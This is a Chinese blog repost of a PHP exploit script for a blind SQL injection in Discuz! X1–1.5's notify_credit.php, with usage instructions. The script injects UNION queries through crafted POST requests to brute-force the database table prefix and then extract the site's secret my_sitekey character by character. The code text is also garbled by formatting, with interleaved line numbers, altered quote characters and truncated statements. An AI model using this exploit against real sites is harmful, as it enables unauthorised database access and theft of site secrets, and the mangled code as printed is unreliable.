DiscuzX1-1.5Sql0day!!

技術小美發表於2017-11-09
SQL

 RT~



    

  1. <?php 
    2. 

  2. print_r(` 
    3. 

  3. +—————————————————————————+ 
    4. 

  4. Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit 
    5. 

  5. by toby57    2010.11.05 
    6. 

  6. mail: toby57 at 163 dot com 
    7. 

  7. team: http://www.wolvez.org 
    8. 

  8. +—————————————————————————+ 
    9. 

  9. `); 
    10. 

  10. if ($argc < 2) { 
    11. 

  11.     print_r(` 
    12. 

  12. +—————————————————————————+ 
    13. 

  13. Usage: php `.$argv[0].` url [pre] 
    14. 

  14. Example: 
    15. 

  15. php `.$argv[0].` http://localhost/ 
    16. 

  16. php `.$argv[0].` http://localhost/ xss_ 
    17. 

  17. +—————————————————————————+ 
    18. 

  18. `); 
    19. 

  19.     exit
    20. 

    21. 

  21. error_reporting(7); 
    22. 

  22. ini_set(`max_execution_time`, 0); 
    23. 

  23. $url = $argv[1]; 
    24. 

  24. $pre = $argv[2]?$argv[2]:`pre_`
    25. 

  25. $target = parse_url($url); 
    26. 

  26. extract($target); 
    27. 

  27. $path .= `/api/trade/notify_credit.php`
    28. 

  28. $hash = array(); 
    29. 

  29. $hash = array_merge($hash, range(48, 57)); 
    30. 

  30. $hash = array_merge($hash, range(97, 102)); 
    31. 

  31.  
    32. 

  32. $tmp_expstr = “`”
    33. 

  33. $res = send(); 
    34. 

  34. if(strpos($res,`SQL syntax`)==false){var_dump($res);die(`Oooops.I can NOT hack it.`);} 
    35. 

  35. preg_match(`/FROMs([a-zA-Z_]+)forum_order/`,$res,$match); 
    36. 

  36. if($match[1])$pre = $match[1]; 
    37. 

  37. $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE “=`”
    38. 

  38. $res = send(); 
    39. 

  39. if(strpos($res,“doesn`t exist”)!==false){ 
    40. 

  40.     echo “Table_pre is WRONG!
    
Ready to Crack It.Please Waiting..
    41. 

  41.     for($i = 1;$i<20;$i++){ 
    42. 

  42.     $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE `%forum_post_tableid%` AND LENGTH(REPLACE(table_name,`forum_post_tableid`,“))=$i AND “=`”
    43. 

  43.     $res = send(); 
    44. 

  44.  
    45. 

  45.     if(strpos($res,`SQL syntax`)!==false){   
    46. 

  46.  
    47. 

  47.     $pre = 
    48. 

  48.     $hash2 = array(); 
    49. 

  49.     $hash2 = array_merge($hash2, range(48, 57)); 
    50. 

  50.     $hash2 = array_merge($hash2, range(97, 122)); 
    51. 

  51.     $hash2[] = 95; 
    52. 

  52.     for($j = 1;$j <= $i$j++){ 
    53. 

  53.     for ($k = 0; $k <= 255; $k++) { 
    54. 

  54.     if(in_array($k$hash2)) { 
    55. 

  55.     $char = dechex($k); 
    56. 

  56.     $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE `%forum_post_tableid%` AND MID(REPLACE(table_name,`forum_post_tableid`,“),$j,1)=0x{$char} AND “=`”
    57. 

  57.     $res = send(); 
    58. 

  58.     if(strpos($res,`SQL syntax`)!==false){ 
    59. 

  59.         echo chr($k); 
    60. 

  60.         $pre .= chr($k);break
    61. 

  61.     }  
    62. 

  62.     }  
    63. 

  63.     }     
    64. 

  64.     }     
    65. 

  65.     if(strlen($pre)){echo 
    
Cracked…Table_Pre:”    .$pre.
    ;break;}else{die(`GET Table_pre Failed..`);}; 
    66. 

  66.     }    }    }; 
    67. 

  67. echo “Please Waiting….
    68. 

  68. $sitekey = 
    69. 

  69. for($i = 1;$i <= 32; $i++){ 
    70. 

  70.   for ($k = 0; $k <= 255; $k++) { 
    71. 

  71.     if(in_array($k$hash)) { 
    72. 

  72.     $char = dechex($k); 
    73. 

  73. $tmp_expstr = “` UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND “=`”
    74. 

  74. $res = send(); 
    75. 

  75. if(strpos($res,`SQL syntax`)!==false){ 
    76. 

  76.         echo chr($k); 
    77. 

  77.         $sitekey .= chr($k);break
    78. 

  78. }}}} 
    79. 

  79. if(strlen($sitekey)!=32)die(
    .`can NOT get the my_sitekey..`); 
    80. 

  80. echo 
    .`Exploit Successfully.`.
    
my_sitekey:{$sitekey}”
    81. 

  81. exit
    82. 

  82.  
    83. 

  83. function sign($exp_str){ 
    84. 

  84.     return md5(“attach=tenpay&mch_vno={$exp_str}&retcode=0&key=”); 
    85. 

    86. 

  86.  
    87. 

  87. function send(){ 
    88. 

  88.     global $host$path$tmp_expstr
    89. 

  89.      
    90. 

  90.     $expdata = “attach=tenpay&retcode=0&trade_no=%2527&mch_vno=”.urlencode(urlencode($tmp_expstr)).“&sign=”.sign($tmp_expstr); 
    91. 

  91.     $data  = “POST $path HTTP/1.1
    92. 

  92.     $data .= “Host: $host
    93. 

  93.     $data .= “Content-Type: application/x-www-form-urlencoded
    94. 

  94.     $data .= “Content-Length: “.strlen($expdata).
    95. 

  95.     $data .= “Connection: Close

    96. 

  96.     $data .= $expdata
    97. 

  97.     $fp = fsockopen($host, 80); 
    98. 

  98.     fputs($fp$data); 
    99. 

  99.     $resp = 
    100. 

  100.     while ($fp && !feof($fp)) 
    101. 

  101.         $resp .= fread($fp, 1024); 
    102. 

  102.     return $resp
    103. 

  103. }   
    104. 

  104. ?> 
    105. 



 




















本文轉hackfreer51CTO部落格,原文連結:http://blog.51cto.com/pnig0s1992/579638,如需轉載請自行聯絡原作者